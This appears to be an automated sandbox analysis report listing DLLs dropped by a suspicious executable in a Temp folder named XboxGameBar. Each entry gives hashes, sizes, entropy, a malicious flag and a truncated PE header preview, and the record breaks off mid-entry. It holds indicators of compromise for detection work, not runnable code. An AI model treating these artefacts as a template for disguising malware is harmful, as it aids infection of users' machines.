                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................o.........................................5...........m...L.....L.......L.......L.......Rich............................PE..d......d.........." ...".(...........,....................................................`.........................................P...d.......................................$...pu..............................0t..@............@...............................text....'.......(.................. ..`.rdata...S...@...T...,..............@..@.data...x8.......,..................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6673920
                                                                                                                                                                                                                                        Entropy (8bit):6.582002531606852
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:EzN+T+xtLlk0PPMAiGoTzeDy3x8lGBlWi9Nk:E5Y6Jk0PPMtfTzp3x8c
                                                                                                                                                                                                                                        MD5:486085AAC7BB246A173CEEA0879230AF
                                                                                                                                                                                                                                        SHA1:EF1095843B2A9C6D8285C7D9E8E334A9CE812FAE
                                                                                                                                                                                                                                        SHA-256:C3964FC08E4CA8BC193F131DEF6CC4B4724B18073AA0E12FED8B87C2E627DC83
                                                                                                                                                                                                                                        SHA-512:8A56774A08DA0AB9DD561D21FEBEEBC23A5DEA6F63D5638EA1B608CD923B857DF1F096262865E6EBD56B13EFD3BBA8D714FFDCE8316293229974532C49136460
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......QN.../.../.../...W(../......./......./......./......./...R.../...Z.../..^W.../.../...-../...",......./.../.../......./......./..Rich./..........PE..d...M7ee.........." ...&..M..........L...................................... f...........`......................................... .a.p.....a.|............Pb..............Pe.p...p.[.T.....................[.(...0.[.@............0M..............................text.....M.......M................. ..`.rdata.......0M.......M.............@..@.data........0a.......a.............@....pdata.......Pb.......b.............@..@.reloc..p....Pe.......e.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51712
                                                                                                                                                                                                                                        Entropy (8bit):5.664902275560485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:cXkHpFLJOXgD7JKgegsvC1wryTXkHjQwDchoPWmzDD/:cXkH/Qswge1WwryTXk8mchoPWmz
                                                                                                                                                                                                                                        MD5:34C2DD52C9E920E035444D6CBDDEB555
                                                                                                                                                                                                                                        SHA1:3FF99987B968261E88032652917F137D4A6A0493
                                                                                                                                                                                                                                        SHA-256:55814D323EE1EC6CD6145AE8F43DBF44D9481E3592AA17B5A17010F7E401FF42
                                                                                                                                                                                                                                        SHA-512:8F0BE0A3E2588BDEFF9F5C4EB728AE43A58A19B91596ADCA0C931D5425A591178F13DCEF68B1B949A2C805E1B9963800397F661688FD3C299D7084EFE45ADAF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rx.^rx.^rx.^{.A^px.^..._px.^9.._px.^..._.x.^..._zx.^..._qx.^..._qx.^rx.^.x.^..._sx.^..._sx.^..-^sx.^..._sx.^Richrx.^........................PE..d....jjc.........." ...!.x...V.......{....................................... ............`............................................h...X...d...................................@...................................@...............p............................text...Xv.......x.................. ..`.rdata...1.......2...|..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3445016
                                                                                                                                                                                                                                        Entropy (8bit):6.099467326309974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:+/+YgEQaGDoWS04ki7x+QRsZ51CPwDv3uFfJx:MLgEXGUZ37x+VZ51CPwDv3uFfJx
                                                                                                                                                                                                                                        MD5:E94733523BCD9A1FB6AC47E10A267287
                                                                                                                                                                                                                                        SHA1:94033B405386D04C75FFE6A424B9814B75C608AC
                                                                                                                                                                                                                                        SHA-256:F20EB4EFD8647B5273FDAAFCEB8CCB2B8BA5329665878E01986CBFC1E6832C44
                                                                                                                                                                                                                                        SHA-512:07DD0EB86498497E693DA0F9DD08DE5B7B09052A2D6754CFBC2AA260E7F56790E6C0A968875F7803CB735609B1E9B9C91A91B84913059C561BFFED5AB2CBB29F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........).h.z.h.z.h.z..Oz.h.z...{.h.z...{.h.z...{.h.z...{.h.z.h.zjh.z...{.h.z=..{.h.z=..{.j.z=..{.h.z=.#z.h.z=..{.h.zRich.h.z........................PE..d.....wd.........." ..."..$...................................................5......o5...`..........................................y/..h...J4.@.....4.|....p2......b4../....4..O..P.,.8.............................,.@............@4..............................text...$.$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata..h....p2.......1.............@..@.idata..^#...@4..$....3.............@..@.00cfg..u....p4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39696
                                                                                                                                                                                                                                        Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                        MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                        SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                        SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                        SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704792
                                                                                                                                                                                                                                        Entropy (8bit):5.55753143710539
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:ihO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0T9qwfU2lvzA:iis/POtrzbLp5dQ0T9qcU2lvzA
                                                                                                                                                                                                                                        MD5:25BDE25D332383D1228B2E66A4CB9F3E
                                                                                                                                                                                                                                        SHA1:CD5B9C3DD6AAB470D445E3956708A324E93A9160
                                                                                                                                                                                                                                        SHA-256:C8F7237E7040A73C2BEA567ACC9CEC373AADD48654AAAC6122416E160F08CA13
                                                                                                                                                                                                                                        SHA-512:CA2F2139BB456799C9F98EF8D89FD7C09D1972FA5DD8FC01B14B7AF00BF8D2C2175FB2C0C41E49A6DAF540E67943AAD338E33C1556FD6040EF06E0F25BFA88FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........q...q...q.....q..p...q..p...q..t...q..u...q..r...q.[.p...q...p.u.q.[.u...q.[.q...q.[.....q.[.s...q.Rich..q.........................PE..d.....wd.........." ...".D...T......<.....................................................`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):46592
                                                                                                                                                                                                                                        Entropy (8bit):5.344765898080963
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:i005Gi4zzWerZi5s+AP6tzPVtLZ9rthfBie/4jejOcmKnNrODgYMjtNtnlsht6oR:thWu6tVlBiIjnVOIjbMrYyeW
                                                                                                                                                                                                                                        MD5:B92F8EFB672C383AB60B971B3C6C87DE
                                                                                                                                                                                                                                        SHA1:ACB671089A01D7F1DB235719C52E6265DA0F708F
                                                                                                                                                                                                                                        SHA-256:B7376B5D729115A06B1CAB60B251DF3EFC3051EBBA31524EA82F0B8DB5A49A72
                                                                                                                                                                                                                                        SHA-512:680663D6C6CD7B9D63160C282F6D38724BD8B8144D15F430B28B417DDA0222BFFF7AFEFCB671E863D1B4002B154804B1C8AF2D8A28FFF11FA94972B207DF081B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........IT..'...'...'.......'..&...'...&...'.."...'..#...'..$...'.0.&...'...&...'.../...'...'...'.......'...%...'.Rich..'.........PE..d...#X.c.........." ...".Z...^......@^....................................................`.............................................d...T...d...............................L.......................................@............p...............................text....Y.......Z.................. ..`.rdata...+...p...,...^..............@..@.data...h#..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):143360
                                                                                                                                                                                                                                        Entropy (8bit):6.075135460374895
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:yYjAONgTgGNWARNEBXRzHJ0Xg9sGkD7EKN7Jv1FL/49olpS0mZP0c:nlTmsCD7Z7Jv19/49olY0m10c
                                                                                                                                                                                                                                        MD5:E611E5C516FE1C3670353E3427DA42B9
                                                                                                                                                                                                                                        SHA1:A946ABDEEBE7FA9CCD7AB256C927BE5902784E4A
                                                                                                                                                                                                                                        SHA-256:B4F41659DC3002F70BC6578801AAD771B45F106103441D1E9B4C553C1E50C939
                                                                                                                                                                                                                                        SHA-512:A1C057DBD4B618FDFDD75F70BFE85DBFC6D2A25FED8E74DD5FBF950A02D7470E1F4BFAC8ED00A5CDEF6A68B8737A156A5A0EA443E826C6B30C94554BD7326B99
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..X...........4....@......t.Z....@......@......@............Y.........~.....).........X..........Rich...........................PE..d....2 e.........." ................<.....................................................`.............................................\............`.......@...............p..`.......................................8............................................text...X........................... ..`.rdata..ho.......p..................@..@.data...h.... ......................@....pdata.......@......................@..@.rsrc........`.......(..............@..@.reloc..`....p.......*..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):199448
                                                                                                                                                                                                                                        Entropy (8bit):6.377510350928234
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:OA1YT2Ga6xWK+RohrRoi9+IC08K9YSMJiCNi+GVwlijAOBgC4i9IPLhhHx:v1YOyGohNoEC08K9oJ5GWl7Fi
                                                                                                                                                                                                                                        MD5:9C21A5540FC572F75901820CF97245EC
                                                                                                                                                                                                                                        SHA1:09296F032A50DE7B398018F28EE8086DA915AEBD
                                                                                                                                                                                                                                        SHA-256:2FF8CD82E7CC255E219E7734498D2DEA0C65A5AB29DC8581240D40EB81246045
                                                                                                                                                                                                                                        SHA-512:4217268DB87EEC2F0A14B5881EDB3FDB8EFE7EA27D6DCBEE7602CA4997416C1130420F11167DAC7E781553F3611409FA37650B7C2B2D09F19DC190B17B410BA5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5.5.5.Mu..5..I.5..I.5..I.5..I.5..I.5..M.5.5..5..I.5..I.5..I...5..I.5.Rich.5.................PE..d......d.........." ..."............0........................................ .......=....`.............................................P................................/..........`3..T........................... 2..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...@!..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67352
                                                                                                                                                                                                                                        Entropy (8bit):6.146621901948148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:rw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJSy:8/5k8cnzeJf9IPL037SyG3Px
                                                                                                                                                                                                                                        MD5:B711598FC3ED0FE4CF2C7F3E0877979E
                                                                                                                                                                                                                                        SHA1:299C799E5D697834AA2447D8A313588AB5C5E433
                                                                                                                                                                                                                                        SHA-256:520169AA6CF49D7EE724D1178DE1BE0E809E4BDCF671E06F3D422A0DD5FD294A
                                                                                                                                                                                                                                        SHA-512:B3D59EFF5E38CEF651C9603971BDE77BE7231EA8B7BDB444259390A8A9E452E107A0B6CB9CC93E37FD3B40AFB2BA9E67217D648BFCA52F7CDC4B60C7493B6B84
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%{..a.e.a.e.a.e..fm.`.e..fe.`.e..f..`.e..fg.`.e.Richa.e.........................PE..d......d.........." ...".................................................................`.........................................`...P................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5762840
                                                                                                                                                                                                                                        Entropy (8bit):6.089392282930885
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:73djosVvASxQKADxYBVD0NErnKqroleDkcWE/Q3pPITbwVFZL7VgVr42I1vJHH++:73ZOKRtlrJ7wfGrs1BHeM+2PocL2
                                                                                                                                                                                                                                        MD5:5A5DD7CAD8028097842B0AFEF45BFBCF
                                                                                                                                                                                                                                        SHA1:E247A2E460687C607253949C52AE2801FF35DC4A
                                                                                                                                                                                                                                        SHA-256:A811C7516F531F1515D10743AE78004DD627EBA0DC2D3BC0D2E033B2722043CE
                                                                                                                                                                                                                                        SHA-512:E6268E4FAD2CE3EF16B68298A57498E16F0262BF3531539AD013A66F72DF471569F94C6FCC48154B7C3049A3AD15CBFCBB6345DACB4F4ED7D528C74D589C9858
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.D.5.*.5.*.5.*.z.+.7.*.z...;.*.z./.9.*.z...=.*.z.).1.*.<../.*.~.+.>.*.5.+.P.*...'..*...*.4.*.....4.*...(.4.*.Rich5.*.........................PE..d......d.........." ...".X%..47.....\H........................................\.......X...`...........................................@......WA......p[.......V.d0....W../....[..C....).T.............................).@............p%..............................text...rV%......X%................. ..`.rdata.......p%......\%.............@..@.data.........A..L...hA.............@....pdata..d0....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc........p[......rV.............@..@.reloc...C....[..D...|V.............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):30480
                                                                                                                                                                                                                                        Entropy (8bit):6.578957517354568
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:N1ecReJKrHqDUI7A700EZ9IPQGNHQIYiSy1pCQn1tPxh8E9VF0NykfF:3eUeJGHqNbD9IPQGR5YiSyvnnPxWEuN
                                                                                                                                                                                                                                        MD5:C97A587E19227D03A85E90A04D7937F6
                                                                                                                                                                                                                                        SHA1:463703CF1CAC4E2297B442654FC6169B70CFB9BF
                                                                                                                                                                                                                                        SHA-256:C4AA9A106381835CFB5F9BADFB9D77DF74338BC66E69183757A5A3774CCDACCF
                                                                                                                                                                                                                                        SHA-512:97784363F3B0B794D2F9FD6A2C862D64910C71591006A34EEDFF989ECCA669AC245B3DFE68EAA6DA621209A3AB61D36E9118EBB4BE4C0E72CE80FAB7B43BDE12
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tB.t'B.t'B.t'K..'@.t'..u&@.t'..q&N.t'..p&J.t'..w&F.t'..u&@.t'B.u'..t'..u&G.t'..y&C.t'..t&C.t'...'C.t'..v&C.t'RichB.t'................PE..d......d.........." ...".....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1504024
                                                                                                                                                                                                                                        Entropy (8bit):6.578962536427207
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:85Cmr6e6a6Ias3yjWdQty0ok8k378UZk+ZfZ4Se6TOs9CedxnYhR2Au:81/uIasCjWdaHokXk+9Z4Se6TO4dFYL5
                                                                                                                                                                                                                                        MD5:08D50FD2B635972DC84A6FB6FC581C06
                                                                                                                                                                                                                                        SHA1:4BCFC96A1AAD74F7AB11596788ACB9A8D1126064
                                                                                                                                                                                                                                        SHA-256:BB5AC4945B43611C1821FA575AF3152B2937B4BC1A77531136780CC4A28F82E9
                                                                                                                                                                                                                                        SHA-512:8EC536E97D7265F007AD0F99FC8B9EECC9355A63F131B96E8A04E4BD38D3C72E3B80E36E4B1923548BD77EB417C5E0AC6A01D09AF23311784A328FBED3C41084
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K3...R...R...R...*&..R..@....R..@....R..@....R..@....R..D*...R...R...R.......R.......R....J..R.......R..Rich.R..........................PE..d......d.........." ..."............................................................._....`.........................................Px...".............................../...........*..T............................(..@...............8............................text...x........................... ..`.rdata..............................@..@.data...PG.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1141016
                                                                                                                                                                                                                                        Entropy (8bit):5.435086202175289
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:83kYbfjwR6nblonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1ol:8UYbMA0IDJcjEwPgPOG6Xyd461ol
                                                                                                                                                                                                                                        MD5:AA13EE6770452AF73828B55AF5CD1A32
                                                                                                                                                                                                                                        SHA1:C01ECE61C7623E36A834D8B3C660E7F28C91177E
                                                                                                                                                                                                                                        SHA-256:8FBED20E9225FF82132E97B4FEFBB5DDBC10C062D9E3F920A6616AB27BB5B0FB
                                                                                                                                                                                                                                        SHA-512:B2EEB9A7D4A32E91084FDAE302953AAC57388A5390F9404D8DFE5C4A8F66CA2AB73253CF5BA4CC55350D8306230DD1114A61E22C23F42FBCC5C0098046E97E0F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................,...............,.....,.....,.y...,.....Rich..........PE..d......d.........." ...".@..........P*...............................................!....`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):109392
                                                                                                                                                                                                                                        Entropy (8bit):6.641929675972235
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                                                                        MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                                                                        SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                                                                        SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                                                                        SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67072
                                                                                                                                                                                                                                        Entropy (8bit):5.872119413277649
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:0lC4VDCD5Pd8jeE9+d8cxIRJpyZVEqyaFtYpquFajBSsDJLSGg8fJwJ5ZRYuK5G:48Dv8qo+xIRyo+FtaFMBFDv7OJ543
                                                                                                                                                                                                                                        MD5:0EDC0F96B64523314788745FA2CC7DDD
                                                                                                                                                                                                                                        SHA1:555A0423CE66C8B0FA5EEA45CAAC08B317D27D68
                                                                                                                                                                                                                                        SHA-256:DB5B421E09BF2985FBE4EF5CDF39FC16E2FF0BF88534E8BA86C6B8093DA6413F
                                                                                                                                                                                                                                        SHA-512:BB0074169E1BD05691E1E39C2E3C8C5FAE3A68C04D851C70028452012BB9CB8D19E49CDFF34EFB72E962ED0A03D418DFBAD34B7C9AD032105CF5ACD311C1F713
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...'G..'G..'G...G..'G.&F..'G.&F..'G."F..'G.#F..'G.$F..'Gi.&F..'G..&G..'Gf./F..'Gf.'F..'Gf..G..'Gf.%F..'GRich..'G................PE..d...Y.Hd.........." ...".....................................................p............`.........................................0...d.......d....P.......@..<............`..........................................@............................................text.............................. ..`.rdata...6.......8..................@..@.data...(:..........................@....pdata..<....@......................@..@.rsrc........P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):655360
                                                                                                                                                                                                                                        Entropy (8bit):6.429498330590438
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Xs/doJlY/OBzRSxUlcUmNNuNkOFIj+fWT0hrHPPoX1yZcG7:mAuOBzRSxUlvFIj+fWIPPM1yZcg
                                                                                                                                                                                                                                        MD5:4327027D7CB61F547E22C4F668EB7BF7
                                                                                                                                                                                                                                        SHA1:22F413D03A90D04D571526687E43EB255F427435
                                                                                                                                                                                                                                        SHA-256:E681900AEB771E57BC063E44B303293E11DF32F1B1FECDCBC00574C00E75626C
